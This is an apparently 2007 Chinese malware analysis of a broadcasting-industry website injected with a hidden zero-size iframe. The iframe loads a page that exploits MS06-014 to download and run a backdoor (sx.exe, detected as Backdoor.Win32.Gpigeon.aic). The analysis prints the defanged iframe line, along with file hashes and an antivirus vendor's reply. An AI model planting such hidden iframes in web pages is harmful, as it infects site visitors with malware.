某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe

某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe

endurer 原创
2007-09-06 第1版

网站页面被植入代码：
/---
＜iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0＞
---/

hxxp://www.h**l*bz.com/x*j***/Dns.htm　包含 JavaScript脚本，首先输出escape编码的信息：
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞，下载 sx.exe，保存为 %system32%/Cuteqq_Cn.exe，再用 shell.execute来运行。

文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97

使用的是WMP媒体文件的图标

Kasepersky 报为 Packed.Win32.Klone.af

 

主　题：	病毒上报邮件分析结果－流水单号:20070905125954073811
发件人：	"" <send@rising.net.cn>	发送时间2007.09.05 14:16

尊敬的客户，您好！
    您的邮件已经收到，感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件，以下是您上传的文件的分析结果：
    1.文件名：sx.exe
    病毒名：Backdoor.Win32.Gpigeon.aic

    您所上报的病毒文件将在19.39.30版本中处理解决。